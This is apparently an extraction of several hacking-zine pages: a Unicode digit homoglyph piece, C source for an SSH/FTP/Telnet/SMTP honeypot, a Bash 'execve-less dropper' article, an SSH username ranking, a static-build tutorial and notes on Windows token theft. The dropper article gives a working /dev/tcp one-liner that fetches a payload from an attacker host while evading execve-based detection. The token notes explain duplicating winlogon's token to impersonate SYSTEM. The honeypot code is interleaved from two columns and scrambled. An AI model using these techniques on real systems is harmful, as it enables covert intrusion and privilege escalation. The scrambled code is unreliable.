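print(demux(wire))
```

From sshd's point of view, the bytes in wire are just the stdin/stdout of one command channel, which is why the port-forwarding policy never sees the individual TCP connections. A real multiplexer such as yamux adds stream open/close signaling and flow control on top of this basic framing.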

Guy Sviry
github: https://github.com/guysv
SAA-TIP 0.0.7
Join Us for the 7th Edition of TyphoonCon!
May 26-30
Location: Le Meridien Seoul Myeongdong
typhooncon.com

Want to have your training considered for TyphoonCon 2025?
2025 CFT is Now Open: https://typhooncon.com/call-for-training-2025/

Don't miss your chance to headline our 2-day conference and enjoy our exceptional perks!
Submit Your Talk at: https://typhooncon.com/call-for-papers-2025/
Digits of Unicode Security/Hacking

When thinking about string-to-integer conversion, we (especially in the "western" world) usually think only about "ASCII" digits – you know, the normal ones, in the range of 0x30 to 0x39.

However, ASCII is a thing of the past – Unicode (thankfully) is widely supported, and its support has also reached the aforementioned str-to-int conversion.

What's important to know is that Unicode actually defines A LOT of different groups of digits, and that number keeps growing (in the last 13 years around 26 groups have been added; i.e. from 42 groups in 2011 we arrived at 68 groups in 2024). Furthermore, some standard str-to-int functions in certain programming languages actually support more digit groups than just the classic ASCII ones.

For example:

● Python's int() supports 68 different digit groups.
● Java's Integer.parseInt() supports 38 different digit groups.
● On the flip side e.g. JavaScript supports only the standard "ASCII" group. Might be different for e.g. Node.js though.

In general, support varies between both languages (i.e. their standard libraries), frameworks, other libraries, and so on.

Furthermore, since some digits in certain groups look somewhat similar to other digits in other groups (especially in the "ASCII" group), one has to be aware of the homoglyph attack (see example on the right).

[Figure: rows of the digits 0 to 9 taken from different Unicode digit groups, including:]
0 1 2 3 4 5 6 7 8 9
𝟎 𝟏 𝟐 𝟑 𝟒 𝟓 𝟔 𝟕 𝟖 𝟗
𝟶 𝟷 𝟸 𝟹 𝟺 𝟻 𝟼 𝟽 𝟾 𝟿
𝟘 𝟙 𝟚 𝟛 𝟜 𝟝 𝟞 𝟟 𝟠 𝟡
𝟢 𝟣 𝟤 𝟥 𝟦 𝟧 𝟨 𝟩 𝟪 𝟫
𝟬 𝟭 𝟮 𝟯 𝟰 𝟱 𝟲 𝟳 𝟴 𝟵
႐ ႑ ႒ ႓ ႔ ႕ ႖ ႗ ႘ ႙
Note: Everything above is the same font, just different Unicode characters.

Homoglyph attack example
(i.e. what happens if you display what you received before doing the conversion).

{ "offer_value": "\u0b68\u0b68\u0b68" }

Buyer's offer: ୨୨୨ USD
[Accept] [Reject]

int("୨୨୨") » 222

Further reading

https://www.fileformat.info/info/unicode/category/Nd/list.htm
https://gynvael.coldwind.pl/?id=419
https://en.wikipedia.org/wiki/Numerals_in_Unicode
https://www.unicode.org/versions/Unicode16.0.0/core-spec/chapter-4/#G124206
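The homoglyph example can be reproduced directly in Python, and a strict parser is one possible way to avoid the mismatch between what is displayed and what is converted. The sketch below is a suggestion, not something the article prescribes; parse_ascii_int is a hypothetical helper name, and it assumes that only non-negative ASCII decimal numbers should be accepted.

```python
import unicodedata


def parse_ascii_int(text: str) -> int:
    """Parse a non-negative integer, accepting only the ASCII digits 0-9."""
    if not text or any(ch not in "0123456789" for ch in text):
        raise ValueError(f"not an ASCII decimal number: {text!r}")
    return int(text)


offer = "\u0b68\u0b68\u0b68"       # the value from the example above
print(unicodedata.name(offer[0]))  # which character is this really?
print(int(offer))                  # 222, as shown in the example

try:
    parse_ascii_int(offer)
except ValueError as err:
    print("rejected:", err)
```

Rejecting non-ASCII digits at the input boundary keeps the displayed value and the converted value in agreement. Whether that is acceptable depends on the application, since users in many locales legitimately type digits from other groups.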

Gynvael Coldwind
https://hexarcana.ch/
https://gynvael.coldwind.pl/
SAA-ALL 0.0.7
Security/Hacking EasyHoneypot

EasyHoneypot
Santiago Garcia-Jimenez
https://github.com/4nimanegra/EasyHoneyPot

The code implements a simple user and password-logging honeypot, designed to detect lateral movements in cyberattacks. It handles authentication for FTP, SSH, Telnet, and SMTP services, displaying credentials, timestamps, and IP addresses on the screen.

if(read(clientSocket,&data,99) < 1){continue;};
data[99]='\0';sscanf(data,"%s",user);
write(clientSocket,"password: ",10);
memset(data,0,100*sizeof(char));
if(read(clientSocket,&data,99) < 1){continue;};data[99]='\0';
sscanf(data,"%s",pass);close(clientSocket);
printf("%d:%s:TELNET:%s:%s\n",mytime.tv_sec,
inet_ntoa(ipclient.sin_addr),user,pass);
fflush(stdout);clientSocket=0;}}
int smtpHoney(){
int smtpSocket, clientLen=0, clientSocket;struct sockaddr_in ip;
struct sockaddr_in ipclient;char data[100];
memset(data,0,100*sizeof(char));char user[100];
#include <libssh/libssh.h> memset(user,0,100*sizeof(char));char pass[100];
#include <libssh/server.h> memset(pass,0,100*sizeof(char));char *b64user,*b64pass;
#include <stdlib.h> struct timeval mytime;bzero((char *) &ip, sizeof(ip));
#include <string.h> ip.sin_family = AF_INET;ip.sin_addr.s_addr = htonl(INADDR_ANY);
#include <stdio.h> ip.sin_port = htons(2500);clientLen=sizeof(ipclient);
#include <sys/time.h> smtpSocket = socket(AF_INET,SOCK_STREAM,0);
#include <unistd.h> if(bind(smtpSocket, &ip , sizeof(ip))<0){return -1;}
#include <sys/types.h> listen(smtpSocket , 20);clientSocket=0;
#include <sys/socket.h> while(1 == 1){if(clientSocket != 0){close(clientSocket);}
#include <netinet/in.h> clientSocket = accept(smtpSocket,&ipclient,&clientLen);
#include <arpa/inet.h> gettimeofday(&mytime, NULL);write(clientSocket,
#include <pthread.h> "220 smtp.ezequiel.ca ESMTP server\r\n",35);
#include <openssl/pem.h> memset(data,0,100*sizeof(char));
#include <signal.h> if(read(clientSocket,&data,99)<1){continue;}; data[99]='\0';
struct sockaddr_in myip; if(strlen(data)>7){sscanf(&data[5],"%s",user);}else{
char *base64decode (const void *b64, int b64lon){ continue;};write(clientSocket,"250-smtp.ezequiel.ca Hello ",
BIO *b64_bio, *mem_bio;int index = 0; 27); write(clientSocket,user,strlen(user));
char *clean = calloc(b64lon,sizeof(char)); write(clientSocket,"\r\n",2);write(clientSocket,
b64_bio = BIO_new(BIO_f_base64()); "250 AUTH LOGIN\r\n",16); memset(data,0,100*sizeof(char));
mem_bio = BIO_new(BIO_s_mem());BIO_write(mem_bio, b64, b64lon); if(read(clientSocket,&data,99)<1){continue;};
BIO_push(b64_bio, mem_bio); sprintf(user,"AUTH"); while(strcmp(user,"AUTH")==0){
BIO_set_flags(b64_bio, BIO_FLAGS_BASE64_NO_NL); write(clientSocket,"334 VXNlcm5hbWU6\r\n",18);
while ( 0 < BIO_read(b64_bio, clean+index, 1) ){index=index+1;} memset(data,0,100*sizeof(char));
BIO_free_all(b64_bio); return clean;} if(read(clientSocket,&data,99)<1){data[0]=’\0’;break;};
static int auth_password(const char *user, const char *password){ data[99]=’\0’;sscanf(data,"%s",user);}
return 0;} if(strlen(data)<1){continue;};
char *getClientIp(ssh_session session) { data[99]=’\0’;sscanf(data,"%s",user);
struct sockaddr_storage tmp; struct sockaddr_in *sock; write(clientSocket,"334 UGFzc3dvcmQ6\r\n",18);
unsigned int len = 100; memset(data,0,100*sizeof(char));
char *ip = (char *)malloc(100*sizeof(char));ip[0]=’\0’; if(read(clientSocket,&data,99)<1){continue;};
getpeername(ssh_get_fd(session), (struct sockaddr*)&tmp, &len); data[99]=’\0’;sscanf(data,"%s",pass);
sock = (struct sockaddr_in *)&tmp; write(clientSocket,"535 Bad password.\r\n",19);
inet_ntop(AF_INET, &sock->sin_addr, ip, len);return ip;} close(clientSocket);
int sshHoney(){ b64user=base64decode(user,strlen(user));
ssh_session session;ssh_bind sshbind;ssh_message message; b64pass=base64decode(pass,strlen(pass));
ssh_channel chan=0; char buf[2048]; int auth=0, sftp=0, i,r; strtok(b64user,"@ezequiel.ca");
struct timeval mytime; printf("%d:%s:SMTP:%s:%s\n",mytime.tv_sec,
while(1==1){ sshbind=ssh_bind_new(); session=ssh_new(); inet_ntoa(ipclient.sin_addr),b64user,b64pass);
ssh_bind_options_set(sshbind, SSH_BIND_OPTIONS_BINDPORT_STR, free(b64user);free(b64pass);fflush(stdout);clientSocket=0;}}
"2200"); int ftpHoney(){
ssh_bind_options_set(sshbind, SSH_BIND_OPTIONS_RSAKEY, int ftpSocket, clientLen=0, clientSocket; struct sockaddr_in ip;
"./ssh_host_rsa_key"); struct sockaddr_in ipclient; char data[100]; char user[100];
gettimeofday(&mytime, NULL); memset(data,0,100*sizeof(char));char pass[100];
if(ssh_bind_listen(sshbind)<0){return -1; memset(user,0,100*sizeof(char));struct timeval mytime;
}else{r=ssh_bind_accept(sshbind,session); memset(pass,0,100*sizeof(char));bzero((char *) &ip, sizeof(ip));
if(r!=SSH_ERROR){if(!ssh_handle_key_exchange(session)) { ip.sin_family = AF_INET; ip.sin_addr.s_addr = htonl(INADDR_ANY);
auth=0; ip.sin_port = htons(2100); clientLen=sizeof(ipclient);
while(!auth){message=ssh_message_get(session); ftpSocket = socket(AF_INET,SOCK_STREAM,0);
if(!message)break; if(bind(ftpSocket, &ip , sizeof(ip))<0){return -1;}
if(ssh_message_type(message)==SSH_REQUEST_AUTH){ listen(ftpSocket , 20);
if(ssh_message_subtype(message)==SSH_AUTH_METHOD_PASSWORD){ while(1 == 1){
printf("%d:%s:SSH:%s:%s\n",mytime.tv_sec, clientSocket = accept(ftpSocket,&ipclient,&clientLen);
getClientIp(session),ssh_message_auth_user(message), gettimeofday(&mytime, NULL);write(clientSocket,"220 \r\n",6);
ssh_message_auth_password(message));fflush(stdout); memset(data,0,100*sizeof(char));
ssh_message_auth_set_methods(message, if(read(clientSocket,&data,99) < 6){continue;};
SSH_AUTH_METHOD_PASSWORD);}} data[99]=’\0’;user[0]=’\0’;sscanf(data,"USER %s",user);
ssh_message_reply_default(message);ssh_message_free(message); write(clientSocket,"331 \r\n",6);
}}}}ssh_disconnect(session);ssh_bind_free(sshbind); memset(data,0,100*sizeof(char));
ssh_finalize();}return 0;} if(read(clientSocket,&data,99) < 6){continue;};
int telnetHoney(){ data[99]=’\0’;pass[0]=’\0’;sscanf(data,"PASS %s",pass);
int telnetSocket,clientLen=0, clientSocket; write(clientSocket,"530 User cannot log in.\r\n",25);
struct sockaddr_in ip;struct sockaddr_in ipclient; close(clientSocket); printf("%d:%s:FTP:%s:%s\n",
char data[100];memset(data,0,100*sizeof(char));char user[100]; mytime.tv_sec,inet_ntoa(ipclient.sin_addr),user,pass);
memset(user,0,100*sizeof(char));char pass[100]; fflush(stdout);clientSocket=0;}}
memset(pass,0,100*sizeof(char));struct timeval mytime; int main(int argc, char **argv){
bzero((char *) &ip, sizeof(ip)); signal(SIGPIPE,SIG_IGN);
ip.sin_family = AF_INET;ip.sin_addr.s_addr = htonl(INADDR_ANY); pthread_t sshThread,ftpThread,telnetThread,smtpThread;
ip.sin_port = htons(2300);clientLen=sizeof(ipclient); pthread_create(&sshThread, NULL,&sshHoney, NULL);
telnetSocket = socket(AF_INET,SOCK_STREAM,0); pthread_create(&ftpThread, NULL,&ftpHoney, NULL);
if(bind(telnetSocket, &ip , sizeof(ip))<0){return -1;} pthread_create(&telnetThread, NULL,&telnetHoney, NULL);
listen(telnetSocket , 20);clientSocket=0; pthread_create(&smtpThread, NULL,&smtpHoney, NULL);
while(1 == 1){if(clientSocket != 0){close(clientSocket);} while(1==1){sleep(60);}}
clientSocket = accept(telnetSocket,&ipclient,&clientLen);
gettimeofday(&mytime, NULL);write(clientSocket,"user: ",6); This work was originally created for PagedOut and translated by the author for UnderD0cs Magazine 12.
memset(data,0,100*sizeof(char)); https://underc0de.org/foro/e-zines/underdocs-julio-2020-numero-12/ (It requires free registration).
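The honeypot above prints one line per login attempt in the form timestamp:ip:service:user:password, and its SMTP part sends the standard base64-encoded AUTH LOGIN prompts. The following is a minimal Python sketch (not part of the author's C program) showing what those prompts decode to and how such log lines could be split afterwards. The function names and the sample log line are hypothetical, and the sketch assumes IPv4 addresses and usernames without colons.

```python
import base64


def decode_smtp_prompt(reply: str) -> str:
    """Decode the base64 payload of an SMTP '334 <base64>' reply."""
    _code, _, payload = reply.strip().partition(" ")
    return base64.b64decode(payload).decode("ascii")


def parse_log_line(line: str) -> dict:
    """Split a 'timestamp:ip:service:user:password' honeypot log line.

    Only the first four colons are treated as separators, so a password
    containing ':' is kept intact (assumption: the user name has no colon).
    """
    timestamp, ip, service, user, password = line.rstrip("\n").split(":", 4)
    return {
        "timestamp": int(timestamp),
        "ip": ip,
        "service": service,
        "user": user,
        "password": password,
    }


if __name__ == "__main__":
    print(decode_smtp_prompt("334 VXNlcm5hbWU6\r\n"))
    print(decode_smtp_prompt("334 UGFzc3dvcmQ6\r\n"))
    # Hypothetical log line in the format printed by the honeypot.
    print(parse_log_line("1727000000:203.0.113.7:SSH:root:pa:ss"))
```

Feeding the honeypot's standard output through a parser like this is one way to build rankings of the most frequently tried usernames and passwords.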

Garcia-Jimenez, Santiago
https://github.com/4nimanegra
CC BY 4.0
Execve(2)-less dropper to annoy security engineers Security/Hacking

Execve(2)-less dropper to annoy security engineers


I. Introduction

Many antivirus and HIDS tools base some (or most) of their detection methods
on kernel probes or modules that aim to detect the invocation of malicious
binaries that could lead to privilege escalation, persistence, or pivoting. In
the almighty Cloud era, we can, for example, think of Falco and its well-known
evt.type = execve condition, which is probably deployed in every Kubernetes
cluster using Falco, as it is part of a default rule¹. However, this small
paper will show how, thanks to the hackers’ best friend Bash, pentesters and
red-teamers can easily bypass such detection mechanisms to further compromise
the target.

II. One shell to rule them all

Bash (and many other shells) has a capability that may look inoffensive at
first: built-ins. As their name states, they are commands that are built
directly into the Bash program, meaning they do not rely on other programs to
execute instructions. If you have ever opened a terminal running Bash, you
have already met them: cd, echo, alias and co.²

Because they are implemented directly in the bash binary, launching those
commands is invisible if you’re looking for new processes being spawned: they
are just part of the initial Bash runtime. If smartly coupled with other shell
mechanisms such as redirections, they make it possible for someone with a
foothold to get new files onto the system and expand their capabilities.

III. The attack

A. The bullet

Before building our devilish one-liner dropper, we first need something to
drop on the machine. As source, which allows us to run shell commands from a
file, is a Bash built-in (hence invisible when looking for malicious spawned
processes), we can imagine dropping and running a Bash library adding new
functions exclusively written with built-ins, like a cat alternative in pure
Bash. Let’s create it:

    #_
    #!/bin/bash

    function z_cat() {
      if [ "$#" -eq 0 ]; then
        echo "Usage: $0 <file> [file ...]" >&2
        return
      fi
      for file in "$@"; do
        if [ ! -r "$file" ]; then
          echo "Cannot read file: $file" >&2
          continue
        fi
        while IFS= read -r line; do
          echo "$line"
        done < "$file"
      done
    }
    # avoid being betrayed by muscle memory :0)
    alias cat="z_cat"

B. The gun

Once this script is live somewhere on a web server accessible from the
compromised machine, we can download it using this one-liner dropper, which
drops what’s stored at $FPATH onto the compromised machine. Only the lines
that follow the #_ marker are written to the file, which is how the HTTP
response headers get skipped:

    exec 3<>/dev/tcp/${IP?}/${PORT?}; printf "GET /${FPATH?} HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n">&3; f=0; while IFS= read -r l<&3; do [ $f -eq 1 ] && echo "$l"; [[ $l == "#_"* ]] && f=1; done > dropped; exec 3<&-

Now you can source the file named dropped and you have your additional Bash
functions loaded!

    bash:~$ . dropped
    bash:~$ z_cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    ...

You can verify that no calls to execve(2) are made using strace:

    # strace -p "${SHELL_PID}" -e trace=execve

IV. Going further

Now that we can easily bypass HIDS looking for new spawned processes, we can
explore novel ways to expand our capabilities and, in the end, gain full
control of the machine. One way I’ve been thinking of but never implemented is
to find a way to patch Bash’s shared library, so that we can add new built-ins
that cannot be mimicked without using binaries (rm is a good example).

On the blue-team side, this technique may be detected by logging every call to
read(2) made by interactive processes (think shells), hence making a full
keylogger. However, this will probably generate a lot of logs, depending on
your infrastructure.

¹https://github.com/falcosecurity/rules/blob/b6ad37371923b28d4db399cf11bd4817f923c286/rules/falco_rules.yaml#L81-L82
²You can get the full list by running man bash and looking for the
‘SHELL BUILTIN COMMANDS’ section.
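The filtering done by the dropper's while loop can be hard to read in its one-line form. Below is a small Python model of that logic only, used here purely for illustration (the attack itself relies on Bash built-ins, not Python). The function name and the sample response are hypothetical.

```python
def extract_payload(response_lines, marker="#_"):
    """Return the lines that follow the first line starting with `marker`.

    This mirrors the dropper's loop: a line is emitted only if the marker
    has already been seen, so the HTTP headers and the marker line itself
    are dropped.
    """
    payload = []
    seen_marker = False
    for line in response_lines:
        if seen_marker:
            payload.append(line)
        elif line.startswith(marker):
            seen_marker = True
    return payload


if __name__ == "__main__":
    # Hypothetical HTTP response, already split into lines.
    response = [
        "HTTP/1.1 200 OK\r",
        "Content-Type: text/plain\r",
        "\r",
        "#_",
        "#!/bin/bash",
        "function z_cat() { :; }",
    ]
    for line in extract_payload(response):
        print(line)
```

The marker is what lets the dropper work without any header parsing: whatever the server sends before the first line starting with #_ is simply ignored.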

Hugo Blanc
Blog: https://syscall.cafe/
CC BY-SA 4.0 X/Twitter: @_angry_penguin
Security/Hacking Hackers' Favorite SSH Usernames: A Top 320 Ranking

Hackers' Favorite SSH Usernames: A Top 320 Ranking


Source: my personal honeypot. Observation period: 22.09.24–09.10.24. Numbers in parentheses denote number of detected samples.
1. ubuntu (2429) 65. koha (102) 129. oscar (27) 193. john (17) 257. tester (14)
2. admin (1837) 66. baikal (101) 130. info (26) 194. postgre (17) 258. 12345 (13)
3. test (1827) 67. ionguest (101) 131. prueba (26) 195. vic (17) 259. b (13)
4. user (1511) 68. payara (99) 132. telecomadmin (26) 196. actordb (16) 260. blank (13)
5. postgres (904) 69. Antminer (97) 133. jack (25) 197. bigdata (16) 261. dell (13)
6. steam (791) 70. pi (80) 134. deployer (24) 198. confluence2 (16) 262. rabbitmq (13)
7. sysadmin (698) 71. ftp (78) 135. palworld (24) 199. dmdba (16) 263. rsync (13)
8. deploy (657) 72. centos (73) 136. plex (24) 200. eluser (16) 264. spark (13)
9. testuser (646) 73. www (73) 137. daemon (23) 201. esearch (16) 265. terraria (13)
10. odoo (630) 74. udatabase (61) 138. games (23) 202. fileftp (16) 266. testing (13)
11. support (570) 75. uucp (56) 139. alex (23) 203. gj5 (16) 267. vpn (13)
12. oracle (536) 76. app (56) 140. butter (23) 204. hysteria (16) 268. xguest (13)
13. ftpuser (436) 77. tom (56) 141. default (23) 205. jfedu1 (16) 269. admin2 (12)
14. debian (414) 78. operator (54) 142. gitlab-psql (23) 206. kuma (16) 270. ansadmin (12)
15. root (385) 79. dolphinscheduler (53) 143. inspur (23) 207. latitude (16) 271. appuser (12)
16. dev (382) 80. test1 (53) 144. mongodb (23) 208. lupeng (16) 272. contador (12)
17. server (366) 81. solana (52) 145. niaoyun (23) 209. modserver (16) 273. grafana (12)
18. guest (283) 82. sonar (48) 146. wordpress (23) 210. moodle (16) 274. james (12)
19. tomcat (276) 83. zabbix (48) 147. 1234 (22) 211. nifi (16) 275. jumpserver (12)
20. username (275) 84. adminadmin (46) 148. bot (22) 212. noama (16) 276. mark (12)
21. usuario (274) 85. docker (46) 149. elsearch (22) 213. ntps (16) 277. mc (12)
22. jenkins (262) 86. esuser (46) 150. lenovo (22) 214. observer (16) 278. rust (12)
23. nexus (261) 87. redis (46) 151. openproject (22) 215. odoo16 (16) 279. sambauser (12)
24. administrator (252) 88. test2 (46) 152. rancher (22) 216. odoo17 (16) 280. service (12)
25. thomas (251) 89. gitlab (45) 153. ts (22) 217. owncast (16) 281. adm (11)
26. test_user (247) 90. demo (44) 154. worker (22) 218. raj_ops (16) 282. Admin (11)
27. svn (246) 91. vagrant (43) 155. amandabackup (21) 219. registery (16) 283. appltest (11)
28. test01 (246) 92. elasticsearch (42) 156. gitlab-runner (21) 220. roamware (16) 284. awsgui (11)
29. tuan (245) 93. samba (42) 157. lsfadmin (21) 221. ruijie (16) 285. esroot (11)
30. sopuser (244) 94. ec2-user (41) 158. proxy (20) 222. runner (16) 286. flussonic (11)
31. tg (244) 95. uftp (41) 159. dspace (20) 223. shyunchen123 (16) 287. gpuadmin (11)
32. acer (240) 96. ansible (40) 160. openvpn (20) 224. stream (16) 288. hive (11)
33. hadoop (240) 97. sol (40) 161. ramesh (20) 225. svnuser (16) 289. kubernetes (11)
34. sammy (239) 98. nginx (39) 162. webapp (20) 226. trinity (16) 290. linux (11)
35. abhishek (238) 99. wang (39) 163. yarn (20) 227. uniadmin (16) 291. rico (11)
36. superman (236) 100. bin (38) 164. config (19) 228. usr1cv8 (16) 292. RPM (11)
37. david (228) 101. nobody (37) 165. factorio (19) 229. woojin (16) 293. sinusbot (11)
38. mysql (227) 102. elastic (37) 166. hp (19) 230. wso2 (16) 294. sshadmin (11)
39. git (224) 103. teste (37) 167. kingbase (19) 231. yealink (16) 295. vyatta (11)
40. iptv (207) 104. ubuntuserver (37) 168. martin (19) 232. zhongren1 (16) 296. airflow (10)
41. es (199) 105. node (35) 169. media (19) 233. ali (15) 297. albert (10)
42. newuser (181) 106. gpadmin (34) 170. mehdi (19) 234. amp (15) 298. ark (10)
43. frappe (166) 107. huawei (34) 171. share (19) 235. arkserver (15) 299. bruno (10)
44. chris (150) 108. jito (34) 172. sk (19) 236. clemens (15) 300. cisco (10)
45. minecraft (145) 109. lighthouse (34) 173. ts3 (19) 237. ftp_client (15) 301. fivem (10)
46. debianuser (132) 110. nagios (34) 174. web (19) 238. manager (15) 302. ftptest (10)
47. kafka (122) 111. apache (32) 175. webdev (19) 239. mssql (15) 303. grid (10)
48. daniel (121) 112. opc (32) 176. lp (18) 240. omkar (15) 304. grohr (10)
49. user1 (119) 113. developer (31) 177. abc (18) 241. omsagent (15) 305. image (10)
50. bkp (118) 114. flask (31) 178. dolphin (18) 242. public (15) 306. install (10)
51. adminftp (114) 115. solr (31) 179. drupal (18) 243. sadmin (15) 307. jeff (10)
52. cacti (111) 116. weblogic (31) 180. ds (18) 244. satisfactory (15) 308. jito-validator (10)
53. anand (109) 117. backup (30) 181. flink (18) 245. tools (15) 309. kali (10)
54. nisec (108) 118. sshd (30) 182. g (18) 246. vps (15) 310. NL5xUDpV2xRa (10)
55. radix (108) 119. master (30) 183. netdata (18) 247. webmaster (15) 311. nova (10)
56. elemental (107) 120. user2 (30) 184. puppet (18) 248. zhongren123 (15) 312. pal (10)
57. nextcloud (106) 121. www-data (29) 185. root123 (18) 249. sys (14) 313. puser (10)
58. reza (106) 122. nvidia (29) 186. sftp (18) 250. data (14) 314. scanner (10)
59. basesystem (105) 123. student (29) 187. vbox (18) 251. elk (14) 315. student3 (10)
60. mosquitto (105) 124. news (28) 188. vmail (18) 252. esadmin (14) 316. t (10)
61. smart (104) 125. anonymous (28) 189. mail (17) 253. mapr (14) 317. teamspeak (10)
62. ubnt (104) 126. ranger (28) 190. a (17) 254. monitor (14) 318. tempuser (10)
63. portal (103) 127. system (28) 191. caddy (17) 255. security (14) 319. x (10)
64. ionadmin (102) 128. dbuser (27) 192. infra (17) 256. temp (14) 320. zookeeper (10)

Szymon Morawski
https://szymor.github.io/
CC0
Wizard's Inventory Art

angrysnail Instagram: @angrysnail


Twitter/X: @angry__snail
SAA-ALL 0.0.7 Reddit: u/angry_snail
Security/Hacking How to generate a Linux static build of a binary

How to generate a Linux static build of a binary


When you need a piece of software on Linux, often a proprietary one, it usually comes as a binary that includes all of its
dependencies, because every Linux distribution is different, and they vary even between versions!

There are 2+1 ways to create a Linux binary that works almost everywhere:
- A self-contained binary with all the dependencies built in; SaaS clients and enterprise tools usually do that, as do
  Bash scripts with an embedded binary payload
- A binary that looks for its dependencies on your machine, as the packages provided by Linux distributions
  usually do
- A package that bundles the binary with the dependencies taken from the machine it is built on, ready to be
  redistributed, as PyInstaller does for Python projects
It is clear that the generated binary will work only on the same architecture, so amd64 on amd64, arm64 on arm64, and so
on.
Compared to AppImage/Flatpak/Snap, this solution doesn’t use a container, with all the benefits and issues containers bring.

The story
I discovered this topic while contributing to the open-source project github.com/sonic2kk/steamtinkerlaunch/, which
needed an updated binary of github.com/pvonmoradi/yad/ (a GTK tool for creating UIs for CLI scripts). At the end of my
experimentation, the project decided to update Yad but still keep the AppImage package instead of my pure Linux version
(which I prefer as an approach, honestly).
What I ended up with is github.com/Mte90/yad-static-build/releases/, with a CI that automatically compiles Yad and
generates this static build, so it doesn’t need any human interaction (like the project I was contributing to).
They don't trust this kind of build for a tool that has to run everywhere from a Steam Deck to a complete distribution, but
I tested the same binary on Arch Linux, Ubuntu and Debian with no issues (also in a KDE environment).

How it works
LD_LIBRARY_PATH is a standard environment variable on Unix/Linux; it is very helpful and used a lot for Linux hacks.
Its purpose is to change at runtime where the dynamic linker looks for shared libraries: it holds a list of directories
(separated by colons) that are searched before the system ones. This is very powerful: with open-source software, for
example, we can download a library, patch it, and use it for one specific program. In our case, we will use it for
something different.
An example to run in your shell: $ LD_LIBRARY_PATH="/opt/my_program/lib" /opt/my_program/start. As you can see,
it is easy to put this in a Bash script.
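As a rough illustration of the same idea from a launcher script, here is a minimal Python sketch that builds an environment with extra library directories placed in front of any existing LD_LIBRARY_PATH. The helper name is made up for this example, and the paths in the usage comment are the placeholder paths from the shell example above, not real files.

```python
import os


def env_with_library_path(lib_dirs, base_env=None):
    """Return a copy of the environment with `lib_dirs` prepended to
    LD_LIBRARY_PATH (a colon-separated list of directories)."""
    env = dict(os.environ if base_env is None else base_env)
    existing = env.get("LD_LIBRARY_PATH", "")
    parts = list(lib_dirs) + ([existing] if existing else [])
    env["LD_LIBRARY_PATH"] = ":".join(parts)
    return env


if __name__ == "__main__":
    env = env_with_library_path(["/opt/my_program/lib"], base_env={})
    print(env["LD_LIBRARY_PATH"])
    # To actually start a program with it (placeholder path):
    # import subprocess
    # subprocess.run(["/opt/my_program/start"], env=env_with_library_path(["/opt/my_program/lib"]))
```

Prepending rather than replacing keeps any directories the user already configured, while still giving the bundled libraries priority.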

With ldd, it is possible to list all the libraries needed by the program we want and investigate them. There are usually
a lot of them, and it can get boring to gather them all manually using UI tools. An example:
$ ldd /usr/bin/echo
linux-vdso.so.1 (0x00007f57cf2f8000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f57cf0c6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f57cf2fa000)
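Gathering the paths by hand gets tedious, so the ldd output can be parsed instead. The sketch below is a minimal, assumption-laden Python example: it only handles the line shapes visible in the output above (name => path (address), or an absolute path followed by an address) and it is not how packelf works internally. The function name is hypothetical.

```python
def parse_ldd_output(output: str) -> list:
    """Return the absolute library paths listed in `ldd` output."""
    paths = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if "=>" in line:
            # e.g. "libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x...)"
            target = line.split("=>", 1)[1].strip()
            path = target.split(" (", 1)[0].strip()
            if path.startswith("/"):  # skips entries such as "not found"
                paths.append(path)
        elif line.startswith("/"):
            # e.g. "/lib64/ld-linux-x86-64.so.2 (0x...)", the dynamic loader
            paths.append(line.split(" (", 1)[0].strip())
        # Lines such as "linux-vdso.so.1 (0x...)" have no file on disk.
    return paths


if __name__ == "__main__":
    sample = """\
        linux-vdso.so.1 (0x00007f57cf2f8000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f57cf0c6000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f57cf2fa000)
    """
    for path in parse_ldd_output(sample):
        print(path)
```

On a real system the input would come from running ldd on the target binary, for example through subprocess.run(["ldd", path], capture_output=True, text=True).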

The tool
So, right now we have a way to gather a list of libraries and a way to inject them into the process, but it would be handy
to have a binary that self-extracts with all this stuff.
Thanks to the discussion at
askubuntu.com/questions/537479/is-there-any-open-source-way-to-make-a-static-from-a-dynamic-executable-with-no,
I discovered a handy tool, github.com/oufm/packelf (I extended it, and after my Pull Request the original developer
implemented my changes in a different way).
Because this tool is written in Bash and generates a self-extracting Bash script, it is easy to modify for any need without
any bundling tools, and easy to read in order to understand how it works.
The tool generates a tar-gzipped Bash script with all the libraries (and the binary) taken from the machine you are running
it on; the libraries are extracted at runtime into a folder under /tmp/ and deleted when the process exits (this behavior
can be disabled).

The Yad example


The package generated by the GitHub CI for Yad without HTML support was 13 MB compressed and 200 MB extracted.
The packaged version with HTML support is 70 MB; you can imagine the decompressed size, as it includes WebKit stuff.

Previously published on personal blog https://daniele.tech/2024/03/how-to-generate-a-linux-static-build-of-a-binary/

Daniele "Mte90" Scasciafratte


Blog: https://daniele.tech
X/Twitter: @mte90net Public Domain
Art lightstation

Yoga Réformanto (foxtronaut)


https://instagram.com/foxtronauts
https://foxtronaut.artstation.com Custom / Negotiated Individually
Playing with tokens Security/Hacking

Playing with Windows Security Tokens


According to Microsoft’s definition, a Security Token is an object that describes
the security context of a process or thread. When a user logs on, Winlogon
asks LSASS for a token and then launches the userinit.exe process, which in
turn runs the Explorer and dies. Most things the user sees are descendants of
the Explorer (however, some exceptions can happen e.g. when the user presses
Ctrl+Shift+Esc). The simplest case happens when the process launches (spawns)
a new one without specifying any special wishes related to the new process’s
identity. The token of the parent is inherited by the child and tokens are
identical. It’s the reason why whoami.exe can analyze and display its own
token, and the information you see tells you the truth about the parent’s token
as well.
When you want to launch a process with a different security context, you need
a token. There are two easy ways to get one:
- Grab username and password and call CreateProcessWithLogon(). Windows does
everything for you. The funny part is the third parameter containing the
cleartext password. If you intercept the call (using debugger trap, hooking,
Detour, Rohitab API Monitor or whatever else) and if you know x64 calling
convention, you can read R8 CPU Register and find the password in the referenced
memory.
- Grab a ready-to-use token and call CreateProcessAsUser(). You can obtain
the token from LogonUser() or duplicate (a.k.a. steal) the token of another
process with DuplicateTokenEx(). Effectively, if you can open another process,
you can act using its security context. In practice, it’s one of the easiest
methods of impersonating LocalSystem. Duplicating the token of winlogon.exe
does the job quickly and efficiently.
